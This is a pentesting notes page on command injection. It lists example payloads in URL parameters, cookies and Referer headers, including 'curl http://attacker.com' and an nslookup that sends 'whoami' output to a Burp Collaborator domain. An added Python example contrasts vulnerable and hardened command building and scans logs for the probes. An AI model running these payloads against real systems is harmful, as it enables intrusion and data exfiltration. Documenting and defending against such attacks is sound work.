Pentesting and Red Teaming Notes

Command Injections

Command injection can occur anywhere, just like SQLi: in URL parameters, form fields, HTTP headers, cookies, the Referer header, etc.

http://example.com/page.jsp?id=1; ping 10.11.122.34

Set-Cookie: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net

GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64)
Referer: http://example.com/page.jsp?id=1; curl http://attacker.com

It can also exist in a submit-feedback form, a newsletter subscription, a contact-us form, etc., wherever the input ends up in a shell command such as:

mail -s "user feedback" -a From:user@example.com

Using `& ping -c5 127.0.0.1 &` causes a delay of about 5 seconds in the response, so the injection can be identified by timing as well as by output:

& nslookup `whoami`.burpcollaborator.net
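As an added example (not part of these notes), the following Python contrasts the pattern behind the `ping` injection above, a handler that splices the `id`/host parameter into a shell string, with a hardened version that allowlists the value and passes an argv list without a shell, and adds a small access-log check that flags the shell metacharacters these probes rely on. The backend, function names and log lines are assumptions constructed for the example.

```python
# Added example, not from the original notes: vulnerable vs. hardened command
# construction for a "ping this host" feature, plus a log check for attempts.
import re
import subprocess
from urllib.parse import unquote, urlsplit


def build_command_vulnerable(host: str) -> str:
    # Builds one string for /bin/sh.  Any shell metacharacter in `host`
    # (; & | ` $( ) is interpreted by the shell, which is exactly what the
    # "id=1; ping 10.11.122.34" payload above exploits.  Shown for contrast only.
    return f"ping -c 1 {host}"


# Allowlist: hostname or IPv4 literal characters only, and the first character
# is never '-' so the value can't be read as an extra ping option either.
_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_command_safe(host: str):
    """Return an argv list for ping, or None if `host` fails the allowlist."""
    if not _HOST_RE.fullmatch(host):
        return None
    return ["ping", "-c", "1", host]


def run_lookup(host: str) -> str:
    # The argv list goes to execve directly (no shell=True), so metacharacters
    # are never interpreted; the allowlist above also blocks option injection.
    argv = build_command_safe(host)
    if argv is None:
        raise ValueError("invalid host")
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout


# Metacharacters and substitution forms that have no place in an id/hostname
# parameter value: ; & | backtick, newline and $(.
_META_RE = re.compile(r"[;&|`\n]|\$\(")

# Constructed access-log lines (assumed format: Common Log Format).  Lines 1 and
# 2 carry the URL-encoded "; ping" and "& nslookup `whoami`" probes shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page.jsp?id=1;%20ping%2010.11.122.34 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:11 +0000] "GET /page.jsp?id=1%20%26%20nslookup%20%60whoami%60.burpcollaborator.net HTTP/1.1" 200 512',
]


def find_injection_attempts(log_lines):
    """Return indices of log lines where some decoded query-string value
    contains shell metacharacters.  Values are decoded individually so a
    literal '&' separating parameters is not mistaken for an injected one."""
    hits = []
    for i, line in enumerate(log_lines):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for pair in query.split("&"):
            value = unquote(pair.partition("=")[2])
            if _META_RE.search(value):
                hits.append(i)
                break
    return hits


if __name__ == "__main__":
    print(build_command_vulnerable("10.11.122.34; id"))   # shell would run `id`
    print(build_command_safe("10.11.122.34; id"))         # None: rejected
    print(find_injection_attempts(SAMPLE_LOG))            # [1, 2]
```

The log check is a triage aid, not a filter: it catches the raw probes in these notes but not every encoding, so the real fix is the argv-plus-allowlist pattern in `build_command_safe`, which removes the shell from the path entirely.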

Last updated 1 year ago